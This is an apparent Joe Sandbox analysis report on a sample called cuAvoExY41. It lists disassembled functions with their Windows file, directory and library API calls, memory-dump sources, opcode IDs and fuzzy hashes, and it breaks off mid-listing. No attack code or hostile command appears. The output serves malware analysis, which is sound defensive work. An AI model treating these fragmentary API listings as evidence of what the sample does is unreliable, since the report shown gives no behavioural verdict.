                                                          control_flow_graph 1083 fb9785-fb9791 1084 fb979e-fb97b5 ReadFile 1083->1084 1085 fb9793-fb979b GetStdHandle 1083->1085 1086 fb9811 1084->1086 1087 fb97b7-fb97c0 call fb98bc 1084->1087 1085->1084 1088 fb9814-fb9817 1086->1088 1091 fb97d9-fb97dd 1087->1091 1092 fb97c2-fb97ca 1087->1092 1094 fb97df-fb97e8 GetLastError 1091->1094 1095 fb97ee-fb97f2 1091->1095 1092->1091 1093 fb97cc 1092->1093 1098 fb97cd-fb97d7 call fb9785 1093->1098 1094->1095 1099 fb97ea-fb97ec 1094->1099 1096 fb980c-fb980f 1095->1096 1097 fb97f4-fb97fc 1095->1097 1096->1088 1097->1096 1100 fb97fe-fb9807 GetLastError 1097->1100 1098->1088 1099->1088 1100->1096 1102 fb9809-fb980a 1100->1102 1102->1098
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00FB9795
                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00FB97AD
                                                          • GetLastError.KERNEL32 ref: 00FB97DF
                                                          • GetLastError.KERNEL32 ref: 00FB97FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$FileHandleRead
                                                          • String ID:
                                                          • API String ID: 2244327787-0
                                                          • Opcode ID: f97266b91ee46dadc662308df9a0393094d638e7f85de65d470e820c33574732
                                                          • Instruction ID: 0cc725d6905f067da9c239701d1700706bb80643b5887e7c4adb29882a253f8e
                                                          • Opcode Fuzzy Hash: f97266b91ee46dadc662308df9a0393094d638e7f85de65d470e820c33574732
                                                          • Instruction Fuzzy Hash: EC11A331918614EBCF205F26C8486E93BA9BB06334F208926E61686190DBF4CE44FF61
                                                          Function 00FDAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00FD3F73,00000000,00000000,?,00FDACDB,00FD3F73,00000000,00000000,00000000,?,00FDAED8,00000006,FlsSetValue), ref: 00FDAD66
                                                          • GetLastError.KERNEL32(?,00FDACDB,00FD3F73,00000000,00000000,00000000,?,00FDAED8,00000006,FlsSetValue,00FE7970,FlsSetValue,00000000,00000364,?,00FD98B7), ref: 00FDAD72
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FDACDB,00FD3F73,00000000,00000000,00000000,?,00FDAED8,00000006,FlsSetValue,00FE7970,FlsSetValue,00000000), ref: 00FDAD80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: 0a4d0d1a7e03fdb0a2cfcb83b643b9c87669073f94009ca83bc7dd8eb55e0a5d
                                                          • Instruction ID: bab8cc9ec8f4d9919a56d25849d81c814cfefd595caffbda952d75a74e882474
                                                          • Opcode Fuzzy Hash: 0a4d0d1a7e03fdb0a2cfcb83b643b9c87669073f94009ca83bc7dd8eb55e0a5d
                                                          • Instruction Fuzzy Hash: 2901473260122AABC7214F789C8CA577B5BEF017B27280621F906D7750D730C800EAE5
                                                          Function 00FB9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00FBD343,00000001,?,?,?,00000000,00FC551D,?,?,?), ref: 00FB9F9E
                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00FC551D,?,?,?,?,?,00FC4FC7,?), ref: 00FB9FE5
                                                          • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00FBD343,00000001,?,?), ref: 00FBA011
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$Handle
                                                          • String ID:
                                                          • API String ID: 4209713984-0
                                                          • Opcode ID: 1d4841a029d19dca16694d246815b14359aa736f9c0488372266c66899187e75
                                                          • Instruction ID: 80a375b838092a58cebca67b3587d016c2aaceacb7dc9c16bea4dcbf7267e684
                                                          • Opcode Fuzzy Hash: 1d4841a029d19dca16694d246815b14359aa736f9c0488372266c66899187e75
                                                          • Instruction Fuzzy Hash: BA31C232608349AFDB14DF21D848BBE77A5FF84764F004519F6819B290CB75AD48EFA2
                                                          Function 00FBA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FBC27E: _wcslen.LIBCMT ref: 00FBC284
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA2D9
                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA30C
                                                          • GetLastError.KERNEL32(?,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA329
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                                          • String ID:
                                                          • API String ID: 2260680371-0
                                                          • Opcode ID: 4843903a8ab7a320bfb26cceac30ccc188f54d0a1178f95b529f41f9ad8f7871
                                                          • Instruction ID: 310caa4f3441a6503dabcb695aca2057985a89d5b9a232c8cf8119e669a6df08
                                                          • Opcode Fuzzy Hash: 4843903a8ab7a320bfb26cceac30ccc188f54d0a1178f95b529f41f9ad8f7871
                                                          • Instruction Fuzzy Hash: CA01D8319002146AEF21AB774C4EBFD33C89F0A794F084459F901D6095DB69CA81FEB7
                                                          Function 00FDB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00FDB8B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID:
                                                          • API String ID: 1807457897-3916222277
                                                          • Opcode ID: 15e245a4ce3ef8ff55e60b104b1f0d7eb21a55340a0e7b75b04ce26382cf7983
                                                          • Instruction ID: 17ae8b41fb5e7eacc85d25b07541d160c7cf2bb15abf7e50a5102a23e1f44152
                                                          • Opcode Fuzzy Hash: 15e245a4ce3ef8ff55e60b104b1f0d7eb21a55340a0e7b75b04ce26382cf7983
                                                          • Instruction Fuzzy Hash: B441FA7190438CDEDF218E24CC94BFABBABDB45304F1804EED59A87242D3359A45EF61
                                                          Function 00FDAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00FDAFDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: String
                                                          • String ID: LCMapStringEx
                                                          • API String ID: 2568140703-3893581201
                                                          • Opcode ID: 1cb45ea99eacec2fbddd6d0b995c23da3465a8c6b9d418d0608b60bb9ec8b694
                                                          • Instruction ID: a7e724b15ac84eb6d6080718062df6961109b564463bf662439d15673ec852ed
                                                          • Opcode Fuzzy Hash: 1cb45ea99eacec2fbddd6d0b995c23da3465a8c6b9d418d0608b60bb9ec8b694
                                                          • Instruction Fuzzy Hash: FB01253260424DBBCF02AF91DC06DEE7F62EF48760F054155FE1426261CA36CA31BB86
                                                          Function 00FDAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00FDA56F), ref: 00FDAF55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalInitializeSectionSpin
                                                          • String ID: InitializeCriticalSectionEx
                                                          • API String ID: 2593887523-3084827643
                                                          • Opcode ID: c032b5c7f4d1f0ed39bf5ff3c938de0ae641d6c103dafd5829099797144bf28c
                                                          • Instruction ID: ce0342052da879e933d258b6d85117a48b2ac98427fc19d60134b7795c11837c
                                                          • Opcode Fuzzy Hash: c032b5c7f4d1f0ed39bf5ff3c938de0ae641d6c103dafd5829099797144bf28c
                                                          • Instruction Fuzzy Hash: 5EF0B43164524CBBCB126F51DC06DADBF62EF04721B404069FD185A260DA759E10B78A
                                                          Function 00FDADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Alloc
                                                          • String ID: FlsAlloc
                                                          • API String ID: 2773662609-671089009
                                                          • Opcode ID: 8c3e983ba39530ae0f162073caffff2c3adffa2367e83b1c86326914885ad2e5
                                                          • Instruction ID: bb29fed0614b12c0f18e26303204dfd3ba8e30e3071756d6bd5b91618c0089fa
                                                          • Opcode Fuzzy Hash: 8c3e983ba39530ae0f162073caffff2c3adffa2367e83b1c86326914885ad2e5
                                                          • Instruction Fuzzy Hash: C6E05531A4134C7BC300AB26EC0AE2EBB52DF04721B0001AAFC049B340DE349E00B2CA
                                                          Function 00FCEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCEAF9
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID: 3To
                                                          • API String ID: 1269201914-245939750
                                                          • Opcode ID: 931b8acfa6c9552a3b1f39b77cc0b01cde084f2e23b9955e44ec9526e6b3e180
                                                          • Instruction ID: d1fb7536c1d25f4ad16e14f77ad0a09d6c89939506cf8d841e4f770b6eecd242
                                                          • Opcode Fuzzy Hash: 931b8acfa6c9552a3b1f39b77cc0b01cde084f2e23b9955e44ec9526e6b3e180
                                                          • Instruction Fuzzy Hash: F5B012CB29B0837C300462015F03E37110CF1C0BA0330801EF504D80C1DC884C023473
                                                          Function 00FDBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00FDBA44,?), ref: 00FDB7E6
                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00FDBA89,?,00000000), ref: 00FDBC64
                                                          • GetCPInfo.KERNEL32(00000000,00FDBA89,?,?,?,00FDBA89,?,00000000), ref: 00FDBC77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: CodeInfoPageValid
                                                          • String ID:
                                                          • API String ID: 546120528-0
                                                          • Opcode ID: c33e6fb80c50b2dca5a328253792564b9249d15e1b519d77ec155df87c9d7c06
                                                          • Instruction ID: 24f7e06e805bd6517d6e9d644cc32a24402c31345605b102c4fd6636143266e9
                                                          • Opcode Fuzzy Hash: c33e6fb80c50b2dca5a328253792564b9249d15e1b519d77ec155df87c9d7c06
                                                          • Instruction Fuzzy Hash: 93513371E00246DEDB208F31C8856BABBE7EF41320F1D406FD4968B352DB399946EB90
                                                          Function 00FB9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00FB9A50,?,?,00000000,?,?,00FB8CBC,?), ref: 00FB9BAB
                                                          • GetLastError.KERNEL32(?,00000000,00FB8411,-00009570,00000000,000007F3), ref: 00FB9BB6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer
                                                          • String ID:
                                                          • API String ID: 2976181284-0
                                                          • Opcode ID: 01bd0b8e85038474bdf90981a542b125a3913a113815c5a3a78da0cdec86e01c
                                                          • Instruction ID: dee00402a995e38ba23df1d2697e10bb8e5f2305c89f1c4e8ea75dae00eefe99
                                                          • Opcode Fuzzy Hash: 01bd0b8e85038474bdf90981a542b125a3913a113815c5a3a78da0cdec86e01c
                                                          • Instruction Fuzzy Hash: 7D41D1319083418FDB24DF16E9849AAB7E9FFD5320F14C92DEA9183260D7F4EE04AE51
                                                          Function 00FDBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FD97E5: GetLastError.KERNEL32(?,00FF1030,00FD4674,00FF1030,?,?,00FD3F73,00000050,?,00FF1030,00000200), ref: 00FD97E9
                                                            • Part of subcall function 00FD97E5: _free.LIBCMT ref: 00FD981C
                                                            • Part of subcall function 00FD97E5: SetLastError.KERNEL32(00000000,?,00FF1030,00000200), ref: 00FD985D
                                                            • Part of subcall function 00FD97E5: _abort.LIBCMT ref: 00FD9863
                                                            • Part of subcall function 00FDBB4E: _abort.LIBCMT ref: 00FDBB80
                                                            • Part of subcall function 00FDBB4E: _free.LIBCMT ref: 00FDBBB4
                                                            • Part of subcall function 00FDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00FDBA44,?), ref: 00FDB7E6
                                                          • _free.LIBCMT ref: 00FDBA9F
                                                          • _free.LIBCMT ref: 00FDBAD5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorLast_abort
                                                          • String ID:
                                                          • API String ID: 2991157371-0
                                                          • Opcode ID: b680bb08ef1a6beffa44ffe60aa308e906d929e13ad2556999d1eee8a6a51655
                                                          • Instruction ID: fc82778b6d4dcf151b4d21112a1c098371820162223d6bb8d117f20966be1322
                                                          • Opcode Fuzzy Hash: b680bb08ef1a6beffa44ffe60aa308e906d929e13ad2556999d1eee8a6a51655
                                                          • Instruction Fuzzy Hash: ED319531904109EFDB10DFA8D841B9D77E6EF44320F6A409BE8049B3A2EB7A9D41FB50
                                                          Function 00FB1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB1E55
                                                            • Part of subcall function 00FB3BBA: __EH_prolog.LIBCMT ref: 00FB3BBF
                                                          • _wcslen.LIBCMT ref: 00FB1EFD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$_wcslen
                                                          • String ID:
                                                          • API String ID: 2838827086-0
                                                          • Opcode ID: 6364b486f4cbc40b67bf538162eeefd7bef845471be4bd6252f06af93fc38874
                                                          • Instruction ID: bc0121b667fc615bc59e97e64fb6430347ebd370c9f7a8b24b076a165f4d75cf
                                                          • Opcode Fuzzy Hash: 6364b486f4cbc40b67bf538162eeefd7bef845471be4bd6252f06af93fc38874
                                                          • Instruction Fuzzy Hash: DE314A729042099FCF11DF99C955AEEBBF6BF58310F50006AF445A7251CB369E14EF60
                                                          Function 00FB9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FB73BC,?,?,?,00000000), ref: 00FB9DBC
                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00FB9E70
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: File$BuffersFlushTime
                                                          • String ID:
                                                          • API String ID: 1392018926-0
                                                          • Opcode ID: 89ec23c944ba82c4a20bb91441c12be700acaa60d636810eac14ef3d685f4058
                                                          • Instruction ID: 9bce05d331721682807bf95b7ac3c99941855920e930c5339e5206cf2829f78a
                                                          • Opcode Fuzzy Hash: 89ec23c944ba82c4a20bb91441c12be700acaa60d636810eac14ef3d685f4058
                                                          • Instruction Fuzzy Hash: C621203164C386ABC714CF36C882AABBBE4AF59314F08080DF5C487141D369E90CAB61
                                                          Function 00FB966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00FB9F27,?,?,00FB771A), ref: 00FB96E6
                                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00FB9F27,?,?,00FB771A), ref: 00FB9716
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
